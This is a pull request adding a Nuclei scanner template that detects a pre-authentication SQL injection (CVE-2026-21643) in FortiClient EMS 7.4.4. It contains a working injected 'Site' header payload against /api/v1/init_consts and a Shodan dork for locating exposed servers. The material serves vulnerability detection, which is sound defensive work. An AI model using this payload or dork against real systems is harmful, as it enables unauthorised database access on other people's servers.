### PR TITLE
Create CVE-2026-21643.yaml

### DIFF
--- a/http/cves/2026/CVE-2026-21643.yaml
+++ b/http/cves/2026/CVE-2026-21643.yaml
@@ -1,0 +1,42 @@
+id: CVE-2026-21643
+
+info:
+  name: FortiClient EMS 7.4.4 - Pre-Authentication SQL Injection
+  author: alirezac0
+  severity: critical
+  description: |
+    FortiClient EMS 7.4.4 contains a pre-authentication SQL injection vulnerability. An unauthenticated attacker can execute arbitrary SQL queries against the underlying PostgreSQL database by sending a crafted `Site` HTTP header to the publicly accessible `/api/v1/init_consts` endpoint.
+  reference:
+    - https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2026-21643
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fortinet
+    product: forticlient_ems
+  tags: cve,cve2026,sqli,fortinet,forticlient,ems,preauth
+
+http:
+  - raw:
+      - |
+        GET /api/v1/init_consts HTTP/1.1
+        Host: {{Hostname}}
+        Site: x'; SELECT CAST('nuclei_cve_2026_21643_test' AS int)--
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'invalid input syntax for type integer'
+          - 'nuclei_cve_2026_21643_test'
+        condition: and
+
+      - type: status
+        status:
+          - 500


### PR DESCRIPTION
### PR Information

- Added CVE-2026-21643 (Pre-Authentication SQL Injection in FortiClient EMS 7.4.4)
- References:
  - https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
  - https://nvd.nist.gov/vuln/detail/CVE-2026-21643

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details 

This template utilizes the safer, error-based extraction method via the unauthenticated `/api/v1/init_consts` endpoint. By injecting a payload that attempts to cast a unique string into an integer (`CAST('nuclei_cve_2026_21643_test' AS int)`), we force a PostgreSQL reflection in the HTTP 500 error response. 

This approach was specifically chosen over the time-based payload on the `/api/v1/auth/signin` endpoint, as the signin endpoint implements brute-force protection that locks out after 3 attempts. This template ensures safe, non-disruptive validation.

**Hunting Dorks:**
- **Shodan:** `http.title:"FortiClient Endpoint Management Server"`
